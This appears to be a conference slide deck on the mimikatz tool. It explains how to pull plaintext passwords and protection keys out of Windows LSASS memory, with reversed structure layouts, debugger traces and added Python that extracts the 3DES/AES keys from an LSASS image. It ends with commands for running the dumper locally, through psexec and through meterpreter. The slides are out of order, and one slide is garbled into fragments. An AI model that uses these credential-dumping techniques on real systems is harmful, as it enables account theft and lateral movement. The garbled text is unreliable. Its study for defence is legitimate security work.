    mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password:
 – PFX files are protected by this password: mimikatz

Keys:
 – When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
 – When you delete a certificate, Windows does not delete its private key… funny, isn't it?
   • So yes, mimikatz can export it
mimikatz crypto: what we can do?

Exactly the same as for sekurlsa, it will prevent access to accounts/computer:
 – no admin, no admin, no admin…

Basics:
 – Use smartcards/tokens for users' certificates
 – Use Hardware Security Modules (HSM), even SoftHSM

More in depth:
 – See what Microsoft can do with TPM from Windows 8
   • Virtual SmartCard seems promising
 – Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
   • Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?

Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver:
 – Play with tokens & privileges
 – Display SSDT x86 & x64
 – List minifilters actions
 – List Notifications (process, thread, image, registry)
 – List Objects hooks and procedures
 – …
…
mimikatz: that's all folks!

Thanks to / Merci à :
 – my girlfriend for her support (her LSASS crashed a few times)
 – Application Security Forum for offering me this great opportunity
   • Partners and Sponsors for sure
 – Microsoft for always considering it as normal/acceptable
 – Security friends/community for their ideas & challenges
   • nagual, newsoft, mubix, …
 – You for your attention

Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact

    blog      http://blog.gentilkiwi.com
    mimikatz  http://blog.gentilkiwi.com/mimikatz
    source    https://code.google.com/p/mimikatz
    email     benjamin@gentilkiwi.com
mimikatz sekurlsa: what is it?

A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)

What the sekurlsa module can dump:
 – MSV1_0 hashes
 – TsPkg passwords
 – Wdigest passwords
 – LiveSSP passwords
 – Kerberos passwords (!)
 – …
mod_mimikatz_sekurlsa
mimikatz sekurlsa: how LSA works? (PLAYSKOOL level)

Diagram: WinLogon hands user/domain/password to LsaSS; the Authentication Packages (msv1_0, tspkg, wdigest, livessp, kerberos) do the authentication: msv1_0 against the SAM, by Challenge/Response, and kerberos.
mimikatz sekurlsa: how LSA works? (PLAYSKOOL level)

Authentication packages:
 – take user's credentials from the logon
 – make their own stuff
 – keep enough data in memory to compute responses to challenges (Single Sign On)

If we can get data and inject it in another session of LSASS, we avoid the authentication part
This is the principle of « Pass-the-hash »
 – In fact of « Pass-the-x »
mimikatz sekurlsa: history of « pass-the-* » 1/2

Pass-the-hash
 – 1997 - Unix: modified SAMBA client for Hashes usage - Paul Ashton (EIGEN)
 – 2000 - Private version of a Windows « LSA Logon Session Editor » - Hernan Ochoa (CoreSecurity)
 – 2007 - TechEd Microsoft: Marc Murray (TrueSec) presents msvctl and provides some downloads of it
 – 2007 - « Pass the hash toolkit » published - Hernan Ochoa (CoreSecurity)
 – 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French so not famous ;))
2007 was the year of pass the hash!

Pass-the-ticket
 – 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support - Hernan Ochoa (Ampliasecurity)
mimikatz sekurlsa: history of « pass-the-* » 2/2

Pass-the-pass
 – 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT 6 and some XP SP3)
   • http://blog.gentilkiwi.com/securite/pass-the-pass
 – 05/2011 – return of mimikatz, it dumps clear text passwords from WDigest provider (unlimited this time ;))
   • http://blog.gentilkiwi.com/securite/re-pass-the-pass
 – 05/2011 – Some organizations opened cases to Microsoft about it…
…Lots of time…
 – begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
 – 03/2012 - Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extract…
   • http://seclists.org/pen-test/2012/Mar/7
 – 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
   • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
 – 03/2012 – yeah, once again… more curious, but Kerberos keeps passwords in memory
   • http://blog.gentilkiwi.com/securite/rererere-pass-the-pass
 – 08/2012 – sekurlsa module without injection at all (ultra safe)
   • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz sekurlsa: tspkg

because sometimes hash is not enough…
mimikatz sekurlsa tspkg: what is it?

Microsoft introduces SSO capability for Terminal Server with NT 6, to improve RemoteApps and RemoteDesktop users' experience
 – http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (= Account delegation)
 – Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression, it seems cool:
 – User does not have to type their password
 – Password is not in the RDP file
 – Password is not in user secrets
mimikatz sekurlsa tspkg: questions?

KB says that for it to work, we must enable « Default credentials » delegation
 – "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
   • What? Our User/Domain/Password | Hash | Ticket? It seems…
 – In all cases the system seems to be vulnerable to pass-the-…

In what form? Our specs: [MS-CSSP]
 – 2.2.1.2.1 TSPasswordCreds
   • The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN).

        TSPasswordCreds ::= SEQUENCE {
            domainName  [0] OCTET STRING,
            userName    [1] OCTET STRING,
            password    [2] OCTET STRING
        }

 – Challenge/response for authentication?
   • Server: YES (TLS, Kerberos)
   • Client: NO, password is sent to server…

So password resides somewhere in memory!
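The TSPasswordCreds structure quoted above, as an added example that is not part of the original slides or of mimikatz: a DER encoder/decoder for that SEQUENCE. It assumes the spec's default EXPLICIT context tags and UTF-16LE strings; the sample credentials are constructed, not a real account. Decoding shows the password field carries the plaintext, which is why the client side must hold it.

```python
"""DER encode/decode of the [MS-CSSP] TSPasswordCreds structure.

Added example, not part of the original slides or of mimikatz. Assumes the
spec's default EXPLICIT context tags and UTF-16LE encoded strings.
"""
from typing import Dict, Tuple

TAG_OCTET_STRING = 0x04
TAG_SEQUENCE = 0x30
TAG_CONTEXT_CONSTRUCTED = 0xA0  # [n] EXPLICIT is encoded as 0xA0 | n
FIELD_NAMES = ("domainName", "userName", "password")  # order = context tag number


def _der_length(n: int) -> bytes:
    """DER definite-form length: short form below 0x80, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + _der_length(len(value)) + value


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """TSPasswordCreds ::= SEQUENCE { domainName [0], userName [1], password [2] }."""
    fields = []
    for idx, text in enumerate((domain, user, password)):
        inner = _tlv(TAG_OCTET_STRING, text.encode("utf-16-le"))
        fields.append(_tlv(TAG_CONTEXT_CONSTRUCTED | idx, inner))
    return _tlv(TAG_SEQUENCE, b"".join(fields))


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, value, position after the TLV); rejects truncated input."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:
        count = length & 0x7F
        if count == 0 or pos + count > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    if pos + length > len(buf):
        raise ValueError("TLV value runs past end of buffer")
    return tag, buf[pos:pos + length], pos + length


def decode_ts_password_creds(blob: bytes) -> Dict[str, str]:
    """Parse TSPasswordCreds and return its three fields as Python strings."""
    tag, body, end = _read_tlv(blob, 0)
    if tag != TAG_SEQUENCE or end != len(blob):
        raise ValueError("not a single TSPasswordCreds SEQUENCE")
    fields: Dict[str, str] = {}
    pos = 0
    while pos < len(body):
        ctag, cval, pos = _read_tlv(body, pos)
        idx = ctag & 0x1F
        if (ctag & 0xE0) != TAG_CONTEXT_CONSTRUCTED or idx >= len(FIELD_NAMES):
            raise ValueError(f"unexpected tag 0x{ctag:02x}")
        itag, ival, iend = _read_tlv(cval, 0)
        if itag != TAG_OCTET_STRING or iend != len(cval):
            raise ValueError("context tag must wrap exactly one OCTET STRING")
        fields[FIELD_NAMES[idx]] = ival.decode("utf-16-le")
    if set(fields) != set(FIELD_NAMES):
        raise ValueError("missing TSPasswordCreds field")
    return fields


def password_is_plaintext(blob: bytes, password: str) -> bool:
    """True when the UTF-16LE bytes of the password appear verbatim in the encoding."""
    return password.encode("utf-16-le") in blob


if __name__ == "__main__":
    # Constructed sample credentials, not a real account.
    blob = encode_ts_password_creds("CONTOSO", "alice", "S3cret-example")
    print(blob.hex())
    print(decode_ts_password_creds(blob))
```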
mimikatz sekurlsa tspkg: symbols & theory

Let's explore some symbols:
 – sounds cool… (thanks Microsoft)

Let's imagine a scenario:
 – Enumerate all sessions to obtain:
   • Username
   • Domain
   • LUID
 – Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with LUID to obtain:
   • TS_CREDENTIAL
 – Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for:
   • TS_PRIMARY_CREDENTIAL with clear text credentials…
    kd> x tspkg!*clear*
    75016d1c  tspkg!TSObtainClearCreds = <no type information>
    kd> x tspkg!*password*
    75011b68  tspkg!TSDuplicatePassword = <no type information>
    75011cd4  tspkg!TSHidePassword = <no type information>
    750195ee  tspkg!TSRevealPassword = <no type information>
    75012fbd  tspkg!TSUpdateCredentialsPassword = <no type information>
    kd> x tspkg!*locate*
    7501158b  tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz sekurlsa tspkg: workflow

Diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable → KIWI_TS_CREDENTIAL → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

    typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
        PVOID unk0;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Password;
    } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_TS_CREDENTIAL {
    #ifdef _M_X64
        BYTE unk0[108];
    #elif defined _M_IX86
        BYTE unk0[64];
    #endif
        LUID LocallyUniqueIdentifier;
        PVOID unk1;
        PVOID unk2;
        PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
    } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz sekurlsa tspkg: demo time

sekurlsa::tspkg
mimikatz sekurlsa: wdigest

because clear text password over http/https is not cool
mimikatz sekurlsa wdigest: what is it?

"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]"
 – Wikipedia: http://en.wikipedia.org/wiki/Digest_access_authentication

"Common Digest Authentication Scenarios:
 – Authenticated client access to a Web site
 – Authenticated client access using SASL
 – Authenticated client access with integrity protection to a directory service using LDAP"
 – Microsoft: http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool:
 – No password over the network, just hashes
 – No reversible password in Active Directory, hashes for each realm
   • Only with Advanced Digest authentication
mimikatz sekurlsa wdigest: what is it?

We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
 • HA1 = MD5(username:realm:password)
 • HA2 = MD5(method:digestURI:[…])

Even after login, HA1 may change… realm comes from the server side and cannot be determined before Windows logon
WDigest provider must have the elements to compute responses for different servers:
 – Username
 – Realm (from server)
 – Password
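The HA1/HA2 arithmetic above, worked through as an added example (not code from the original slides or from mimikatz): it computes the RFC 2617 response and then contrasts an SSP that keeps the password with one that keeps only the HA1 of the logon realm, against a server in another realm. Realm names, nonce and credentials are constructed, except the RFC 2617 test vector used in the check.

```python
"""Digest access authentication arithmetic (RFC 2617), as used by WDigest.

Added example, not part of the original slides or of mimikatz. It shows why a
client that must answer challenges for realms it only learns from the server
has to keep the password: HA1 depends on the realm.
"""
import hashlib
import hmac
from typing import Dict, Optional


def _md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password): the only term that involves the secret."""
    return _md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth (auth-int would also hash the body)."""
    return _md5_hex(f"{method}:{digest_uri}")


def response_from_ha1(h1: str, nonce: str, h2: str, nc: Optional[str] = None,
                      cnonce: Optional[str] = None, qop: Optional[str] = None) -> str:
    """MD5(HA1:nonce:HA2), or MD5(HA1:nonce:nc:cnonce:qop:HA2) when qop is used.

    Only HA1 is needed here, which is why a server (Advanced Digest in AD)
    can store one HA1 per realm instead of the password.
    """
    if qop is None:
        return _md5_hex(f"{h1}:{nonce}:{h2}")
    return _md5_hex(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")


def response_from_password(username: str, realm: str, password: str, method: str,
                           digest_uri: str, nonce: str, nc: Optional[str] = None,
                           cnonce: Optional[str] = None, qop: Optional[str] = None) -> str:
    """What a client holding the password computes once the server's realm is known."""
    return response_from_ha1(ha1(username, realm, password), nonce,
                             ha2(method, digest_uri), nc, cnonce, qop)


def server_verify(stored_ha1: str, method: str, digest_uri: str, nonce: str,
                  client_response: str) -> bool:
    """Server-side check using only its stored per-realm HA1 (no qop, as on the slide)."""
    expected = response_from_ha1(stored_ha1, nonce, ha2(method, digest_uri))
    return hmac.compare_digest(expected, client_response)


def sso_outcome(username: str, password: str, logon_realm: str,
                challenge_realm: str, nonce: str = "constructed-nonce") -> Dict[str, bool]:
    """Compare two SSO strategies against a server whose realm is challenge_realm.

    'password':   the SSP keeps the password and derives HA1 for any realm.
    'cached_ha1': the SSP keeps only the HA1 of the realm seen at logon.
    """
    method, uri = "GET", "/index.html"  # constructed request
    server_ha1 = ha1(username, challenge_realm, password)  # what the server holds
    with_password = response_from_password(username, challenge_realm, password,
                                           method, uri, nonce)
    with_cached = response_from_ha1(ha1(username, logon_realm, password), nonce,
                                    ha2(method, uri))
    return {
        "password": server_verify(server_ha1, method, uri, nonce, with_password),
        "cached_ha1": server_verify(server_ha1, method, uri, nonce, with_cached),
    }


if __name__ == "__main__":
    print(sso_outcome("alice", "S3cret-example", "realm-a", "realm-a"))
    print(sso_outcome("alice", "S3cret-example", "realm-a", "realm-b"))
```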
mimikatz sekurlsa wdigest: theory

This time we know:
 – that WDigest keeps the password in memory « by protocol » for the HA1 digest
 – that LSASS loves to unprotect passwords with LsaUnprotectMemory (so protects with LsaProtectMemory)

LsaUnprotectMemory
 – At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
 – Let's perform a search in WDigest
 – Hypothesis seems verified

LsaProtectMemory
 – At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
 – Let's perform a search in WDigest
 – SpAcceptCredentials takes the clear password in args
   • Protects it with LsaProtectMemory
   • Updates or inserts data in the double linked list wdigest!l_LogSessList
    .text:7409D151 _DigestCalcHA1@8         call dword ptr [eax+0B4h]
    .text:74096C69 _SpAcceptCredentials@16  call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest: workflow

Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list wdigest!l_LogSessList for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear

    typedef struct _KIWI_WDIGEST_LIST_ENTRY {
        struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
        struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
        DWORD UsageCount;
        struct _KIWI_WDIGEST_LIST_ENTRY *This;
        LUID LocallyUniqueIdentifier;
        /* […] */
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
        /* […] */
    } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz sekurlsa wdigest: demo time

sekurlsa::wdigest
mimikatz sekurlsa: livessp

because Microsoft was too good in closed networks
mimikatz sekurlsa livessp: how?

Actually I've only used a logical (empirical) approach to search passwords…
 – Protocol reading
 – Symbols searching
~ Boring ~… be more brutal this time: make a WinDBG trap!
    0: kd> !process 0 0 lsass.exe
    PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
        DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
        Image: lsass.exe

    0: kd> .process /i 83569040
    You need to continue execution (press 'g' <enter>) for the context
    to be switched. When the debugger breaks in again, you will be in
    the new process context.
    0: kd> g
    Break instruction exception - code 80000003 (first chance)
    nt!RtlpBreakWithStatusInstruction:
    814b39d0 cc              int     3
    0: kd> .reload /user
    Loading User Symbols
    0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
    0: kd> g
mimikatz sekurlsa livessp: how?

Let's login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

    lsasrv!LsaProtectMemory
    livessp!LiveMakeSupplementalCred
    livessp!LiveMakeSecPkgCredentials
    livessp!LsaApLogonUserEx2
    livessp!SpiLogonUserEx2
        ← Our LiveSSP provider

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials

    1: kd> uf /c livessp!LsaApLogonUserEx2
    livessp!LsaApLogonUserEx2 (74781536)
    […]
      livessp!LsaApLogonUserEx2+0x560 (74781a96):
        call to livessp!LiveCreateLogonSession (74784867)

Yeah! Pass the Hash capability with Live account too…
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp: workflow

Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

    typedef struct _KIWI_LIVESSP_LIST_ENTRY {
        struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
        struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
        DWORD unk4;
        DWORD unk5;
        PVOID unk6;
        LUID LocallyUniqueIdentifier;
        LSA_UNICODE_STRING UserName;
        PVOID unk7;
        PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
    } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

    typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
        DWORD isSupp;
        DWORD unk0;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz sekurlsa

Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz sekurlsa: kerberos

Let's login with a normal account
After credentials protection, KerbCreateLogonSession calls:
 – NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
 – NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

    lsasrv!LsaProtectMemory
    kerberos!KerbHideKey
    kerberos!KerbCreatePrimaryCredentials
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials
        ← Kerberos ticket part? Maybe ;)

    lsasrv!LsaProtectMemory
    kerberos!KerbHidePassword
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials
        ← Kerberos part for password

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    wdigest!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials
mimikatz sekurlsa kerberos (nt6): workflow

Diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

    typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
        DWORD unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
    #ifdef _M_X64
        BYTE unk4[32];
    #elif defined _M_IX86
        BYTE unk4[20];
    #endif
        LUID LocallyUniqueIdentifier;
    #ifdef _M_X64
        BYTE unk5[44];
    #elif defined _M_IX86
        BYTE unk5[36];
    #endif
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz sekurlsa kerberos (nt5): workflow

Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list kerberos!KerbLogonSessionList for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear

    typedef struct _KIWI_KERBEROS_LOGON_SESSION {
        struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
        struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
        DWORD UsageCount;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        DWORD unk3;
        DWORD unk4;
        PVOID unk5;
        PVOID unk6;
        PVOID unk7;
        LUID LocallyUniqueIdentifier;
    #ifdef _M_IX86
        DWORD unk8;
    #endif
        DWORD unk9;
        DWORD unk10;
        PVOID unk11;
        DWORD unk12;
        DWORD unk13;
        PVOID unk14;
        PVOID unk15;
        PVOID unk16;
        /* […] */
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz sekurlsa: demo time

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz sekurlsa kerberos: "hu?"

Ok. It works…
But why?
Not at all logons on NT5 (can need an unlock)

From my understanding of Microsoft explanations:
 – no need of passwords for the Kerberos protocol…
 – all is based on the hash (not very sexy too)

Microsoft's implementation of Kerberos is full of logical…
 – For password auth:
   • password hash for shared secret, but keeping password in memory
 – For full smartcard auth:
   • No password on client
   • No hash on client
     – NTLM hash on client…
     – KDC sent it back as a gift!
mimikatz sekurlsa

All passwords in memory are encrypted, but in a reversible way, to be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
 – This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) in the LSASS process to take benefit of its keys when we called it

Can it be fun to decrypt outside the process?
 – Yes it is… no more injection, just reading memory of the LSASS process…
mimikatz can use lsasrv.dll too, and "imports" LSASS initialized keys
 – When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we have the same behaviour as when we are in LSASS
mimikatz sekurlsa: LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses:
 – RC4
 – DESx

Diagram: g_pRandomKey (BYTE[g_cbRandomKey]), g_cbRandomKey (DWORD, 256), g_pDESXKey (BYTE[144]) and g_Feedback (BYTE[8]) are read from lsasrv inside the lsass process and copied… into the lsasrv loaded by mimikatz.
mimikatz sekurlsa: LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses:
 – 3DES
 – AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
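As an added example (not code from the slides or from mimikatz), the following Python resolves the NT6 protection keys from a copy of LSASS memory the way a no-injection reader has to: start at the lsasrv!h3DesKey and lsasrv!hAesKey symbols, follow KIWI_BCRYPT_KEY.cle to KIWI_BCRYPT_KEY_DATA and take its data, and read lsasrv!InitializationVector. The memory image is constructed; the x86 layout (4-byte pointers), the tag magic value, the rule that the data length is size minus the 32-byte header, and the size rule in key_for_secret (8-byte multiples use 3DES, anything else AES) are assumptions the slide does not state.

```python
"""
Resolve the NT6 LSA protection keys from a copy of LSASS memory, following
lsasrv!h3DesKey / lsasrv!hAesKey -> KIWI_BCRYPT_KEY.cle -> KIWI_BCRYPT_KEY_DATA.data
and reading lsasrv!InitializationVector. Added example, not mimikatz code.
Assumptions (not stated on the slide): x86 layout with 4-byte pointers, the tag
magic value, data length = KIWI_BCRYPT_KEY_DATA.size - header, and the size rule
in key_for_secret. The memory image is constructed.
"""
import struct

PTR = "<I"                                       # x86 pointer
KEY_HDR = struct.Struct("<IIIII")                # KIWI_BCRYPT_KEY: size, type, unk0, cle, unk1
KEY_DATA_HDR = struct.Struct("<IIIIIIII")        # KIWI_BCRYPT_KEY_DATA: size, tag, type, unk0..unk3, unk4
KEY_DATA_TAG = 0x4D53534B                        # assumed magic for the tag field (example value)


class LsassImage:
    """Flat copy of one LSASS region plus the addresses of the symbols we need."""

    def __init__(self, base, data, symbols):
        self.base, self.data, self.symbols = base, data, symbols

    def read(self, addr, size):
        off = addr - self.base
        if off < 0 or off + size > len(self.data):
            raise ValueError(f"read outside image: {addr:#x}+{size}")
        return self.data[off:off + size]

    def ptr(self, addr):
        return struct.unpack(PTR, self.read(addr, 4))[0]


def read_bcrypt_key(img, handle_symbol):
    """symbol -> PKIWI_BCRYPT_KEY -> .cle -> KIWI_BCRYPT_KEY_DATA -> raw key material."""
    key = img.ptr(img.symbols[handle_symbol])             # h3DesKey / hAesKey hold a pointer
    _size, _type, _unk0, cle, _unk1 = KEY_HDR.unpack(img.read(key, KEY_HDR.size))
    d_size, tag = struct.unpack("<II", img.read(cle, 8))
    if tag != KEY_DATA_TAG:
        raise ValueError(f"unexpected KIWI_BCRYPT_KEY_DATA tag {tag:#x} at {cle:#x}")
    data_len = d_size - KEY_DATA_HDR.size                 # assumption: size covers header + data
    if data_len not in (16, 24):                          # AES-128 / 3DES key sizes expected here
        raise ValueError(f"implausible key length {data_len}")
    return img.read(cle + KEY_DATA_HDR.size, data_len)


def lsa_keys(img):
    """The three things LsaEncryptMemory needs on NT6, copied out of LSASS."""
    return {
        "iv": img.read(img.symbols["lsasrv!InitializationVector"], 16),
        "3des": read_bcrypt_key(img, "lsasrv!h3DesKey"),
        "aes": read_bcrypt_key(img, "lsasrv!hAesKey"),
    }


def key_for_secret(secret_len):
    """Which key a secret of this size is protected with (assumed rule:
    8-byte multiples -> 3DES, anything else -> AES)."""
    return "3des" if secret_len % 8 == 0 else "aes"


def build_sample_image():
    """Constructed region: IV at +0, h3DesKey at +0x10, hAesKey at +0x14,
    KIWI_BCRYPT_KEY at +0x100/+0x200 and their KEY_DATA at +0x120/+0x220."""
    base, mem = 0x75000000, bytearray(0x300)
    iv, k3des, kaes = bytes(range(16)), bytes(range(0x20, 0x38)), bytes(range(0x40, 0x50))

    def put_key(off, cle_off, material):
        mem[off:off + KEY_HDR.size] = KEY_HDR.pack(KEY_HDR.size, 0, 0, base + cle_off, 0)
        hdr = KEY_DATA_HDR.pack(KEY_DATA_HDR.size + len(material), KEY_DATA_TAG, 0, 0, 0, 0, 0, 0)
        mem[cle_off:cle_off + len(hdr) + len(material)] = hdr + material

    mem[0:16] = iv
    mem[0x10:0x18] = struct.pack("<II", base + 0x100, base + 0x200)
    put_key(0x100, 0x120, k3des)
    put_key(0x200, 0x220, kaes)
    symbols = {"lsasrv!InitializationVector": base,
               "lsasrv!h3DesKey": base + 0x10, "lsasrv!hAesKey": base + 0x14}
    return LsassImage(base, bytes(mem), symbols)


if __name__ == "__main__":
    keys = lsa_keys(build_sample_image())
    for name, value in keys.items():
        print(f"{name:4s} {value.hex()}")
    print("16-byte secret ->", key_for_secret(16), "/ 13-byte secret ->", key_for_secret(13))
```

On a real dump the symbol addresses come from the PDB (the memo slide lists them) plus the load address of lsasrv.dll; the pointer chasing is the same.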
mimikatz sekurlsa: memo
Security Packages
Package          Symbols                                 Type
tspkg            tspkg!TSGlobalCredTable                 RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                   LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList      LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList           LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable    RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList                 LIST_ENTRY
                 lsasrv!LogonSessionListCount            ULONG

Protection Keys
Key    NT5 symbols
RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESX   lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key    NT6 symbols
       lsasrv!InitializationVector
3DES   lsasrv!h3DesKey
AES    lsasrv!hAesKey
mimikatz sekurlsa: memo
Some commands:
  mimikatz privilege::debug sekurlsa::logonPasswords full exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
